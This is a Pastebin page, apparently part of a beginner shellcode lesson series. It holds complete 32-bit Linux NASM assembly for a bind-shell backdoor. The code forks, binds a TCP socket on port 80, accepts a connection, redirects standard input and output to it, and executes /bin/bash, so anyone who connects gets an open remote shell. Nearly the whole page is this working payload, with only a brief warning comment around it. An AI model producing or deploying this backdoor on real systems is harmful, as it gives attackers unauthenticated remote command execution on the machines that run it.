API tools faq
paste
Advertisement
Madmouse

Remote exploit backdoor shellcode 32bit version

Madmouse
Sep 11th, 2014
286
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 2.31 KB | None | 0 0
raw download clone embed print report
  1. ;
  2. ; part of my shellcode for noobs lesson series hosted in #goatzzz on irc.enigmagroup.org
  3. ; SAFETY:
  4. ;   /!\ DO NOT FORGET TO KILL THIS AFTER RUNNING IT, IT WILL LEAVE YOU WITH AN OPEN SHELL FACING THE INTERNET /!\
  5. ; ----------------------------------------------------------------------------
  6. ; "THE BEER-WARE LICENSE" (Revision 43):
  7. ; <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
  8. ; can do whatever you want with this stuff. If we meet some day, and you think
  9. ; this stuff is worth it, you can buy me a beer in return Aaron R. Yool
  10. ; ----------------------------------------------------------------------------
  11. ; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
  12.  
  13. [bits 32]
  14. section .text
  15. global _start
  16. _start:
  17. ; fork(void);
  18.     xor eax,eax
  19.     mov al,0x02
  20.     int 0x80
  21.     cmp eax,1   ; if this is a child, or we have failed to clone
  22.     jl fork     ; jump to the main code
  23.     jmp exit
  24. fork:
  25. ; socket(AF_INET, SOCK_STREAM, 0);
  26.     xor eax,eax
  27.     xor ebx,ebx
  28.     push eax
  29.     mov al,0x6  ; IPPROTO_TCP
  30.     push eax
  31.     mov al,0x1  ; SOCK_STREAM
  32.     push eax
  33.     mov al,0x2  ; AF_INET
  34.     push eax
  35.     xor eax,eax
  36.     mov al, 0x66 ; sys_socketcall
  37.     mov bl,0x1  ; sys_socket
  38.     mov ecx,esp
  39.     int 0x80
  40. ; bind(s, (struct sockaddr *) &name, sizeof (name));
  41.     mov esi,eax
  42.     xor eax,eax
  43.     xor ebx,ebx
  44.     push eax    ; garbage
  45.     push eax    ; garbage
  46.     push eax    ; sin_addr.s_addr
  47.     mov ah,0x50
  48.     push eax; sin_port: 80
  49.     xor eax,eax
  50.     mov bl,0x02 ; sin_family: AF_INET
  51.     push bx
  52.     mov edx,esp
  53.     mov bl,0x10
  54.     push ebx
  55.     mov bl,0x2 ; sys_bind
  56.     push edx
  57.     push esi ;s
  58.     mov edx,esi
  59.     mov ecx,esp
  60.     mov al,0x66 ; sys_socketcall
  61.     int 0x80
  62.  
  63. ; listen(s, 0);
  64.     xor eax,eax
  65.     mov bl,0x4  ; sys_listen
  66.     mov al,0x66 ; sys_socketcall
  67.     int 0x80
  68.  
  69. ; accept(s, 0, 0);
  70.     xor eax,eax
  71.     xor ebx,ebx
  72.     push eax
  73.     push eax
  74.     push esi    ; sin
  75.     mov ecx,esp
  76.     mov bl,0x5  ; sys_accept
  77.     mov al,0x66 ; sys_socketcall
  78.     int 0x80
  79.  
  80. ; dup2(sin,i);
  81.     mov esi,eax
  82.     xor ebx,ebx
  83.     xor ecx,ecx
  84. loop:
  85.     xor eax,eax
  86.     mov ebx,esi ; sin
  87.     mov al,0x3f ; sys_dup2
  88.     int 0x80
  89.     inc ecx
  90.     cmp ecx,4
  91.     jne loop
  92.  
  93. ; execve(SHELLPATH,{SHELLPATH,0},0);
  94.     xor eax,eax
  95.     mov al,0x0b
  96.     jmp short sh
  97. load_sh:
  98.     pop esi
  99.     xor edx,edx
  100.     push edx
  101.     push esi
  102.     mov ecx,esp
  103.     mov ebx,esi
  104.     int 0x80
  105. exit:
  106. ; exit(0);
  107.     xor eax,eax
  108.     mov al,0x1
  109.     xor ebx,ebx
  110.     int 0x80
  111.  
  112. sh:
  113.     call load_sh
  114.     db "/bin/bash"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!